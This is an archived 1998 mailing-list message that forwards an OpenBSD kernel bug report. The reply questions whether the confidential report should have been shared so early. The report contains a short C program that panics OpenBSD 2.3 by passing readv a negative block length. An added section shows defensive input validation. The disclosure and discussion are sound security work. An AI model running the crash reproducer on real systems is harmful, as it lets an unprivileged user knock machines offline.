Re: Fwd: Any user can panic OpenBSD machine

From: David Maxwell (davidat_private)
Date: Mon Jul 27 1998 - 12:00:49 PDT


    Since this bug is explicitly marked confidential, and was only opened today,
    would it not have been reasonable to delay forwarding this? Given that the
    OpenBSD people are particularly enthusiastic about security auditing, I expect
    it will be fixed quickly.
    
                                                            David Maxwell
    
     On Mon, Jul 27, 1998 at 11:23:59AM -0600, Michael Fuhr wrote:
    > -----Forwarded message from jonat_private-----
    >
    > Message-Id: <199807271126.MAA16724at_private>
    > Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST)
    > From: jonat_private
    > To: gnatsat_private
    > X-Send-Pr-Version: 3.97
    > Subject: kernel/549: Any user can panic OpenBSD machine
    > Sender: owner-bugsat_private
    >
    >
    > >Number:         549
    > >Category:       kernel
    > >Synopsis:       readv with -ve block size panics kernel
    > >Confidential:   yes
    > >Severity:       critical
    > >Priority:       high
    > >Responsible:    bugs
    > >State:          open
    > >Class:          sw-bug
    > >Submitter-Id:   net
    > >Arrival-Date:   Mon Jul 27 05:40:02 MDT 1998
    > >Last-Modified:
    > >Originator:     Jon Ribbens
    > >Organization:
    > \/ Jon Ribbens / jonat_private
    > >Release:        2.3
    > >Environment:
    >
    >         System      : OpenBSD 2.3
    >         Architecture: OpenBSD.i386
    >         Machine     : i386
    > >Description:
    >         readv with one of the blocks having a -ve size panics the kernel.
    >         Oops.
    >
    > >How-To-Repeat:
    >
    > #include <sys/types.h>
    > #include <sys/uio.h>
    > #include <unistd.h>
    >
    > int main(void) {
    >   struct iovec iov[1];
    >   char buffer[1024];
    >
    >   iov[0].iov_base = buffer;
    >   iov[0].iov_len = -1;
    >
    >   return readv(0, iov, 1);
    > }
    >
    >         run the above program, type a few characters, press return, observe
    >         either kernel panic or machine hang. panic message is
    >         "panic: ureadc: non-positive resid". Any user can do this.
    >
    >
    > >Fix:
    >         Dunno I'm afraid.
    >
    >
    > >Audit-Trail:
    > >Unformatted:
    >
    > -----End of forwarded message-----
    >
    > --
    > Michael Fuhr
    > http://www.fuhr.net/~mfuhr/
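
An added example, not part of the original thread and not OpenBSD's actual fix: the kind of up-front iovec validation whose absence the report above demonstrates, rejecting the vector with EINVAL before any transfer starts. The names `iov_validate` and `EX_IOV_MAX` are hypothetical, and the code assumes a platform where `iov_len` is a `size_t`.

```c
#include <errno.h>
#include <limits.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/uio.h>

#ifndef SSIZE_MAX
#define SSIZE_MAX LONG_MAX      /* fallback if <limits.h> does not expose it */
#endif

#define EX_IOV_MAX 1024         /* assumed cap on vector length (illustrative) */

/*
 * Hypothetical helper: check an iovec array before it is used.
 * Returns 0 and stores the total byte count in *total, or returns EINVAL.
 */
int iov_validate(const struct iovec *iov, int iovcnt, size_t *total)
{
    size_t sum = 0;
    int i;

    if (iov == NULL || total == NULL || iovcnt <= 0 || iovcnt > EX_IOV_MAX)
        return EINVAL;

    for (i = 0; i < iovcnt; i++) {
        size_t len = iov[i].iov_len;

        /* iov_len = -1 is SIZE_MAX here; read as a signed count it is negative. */
        if (len > (size_t)SSIZE_MAX)
            return EINVAL;
        /* The running total must also fit in ssize_t; test before adding
         * so the sum itself can never wrap. */
        if (len > (size_t)SSIZE_MAX - sum)
            return EINVAL;
        sum += len;
    }
    *total = sum;
    return 0;
}

int main(void)
{
    char buffer[1024];
    struct iovec iov[1];
    size_t total = 0;

    iov[0].iov_base = buffer;
    iov[0].iov_len = (size_t)-1;        /* the value from the report */
    return iov_validate(iov, 1, &total) == EINVAL ? 0 : 1;
}
```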
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:08:28 PDT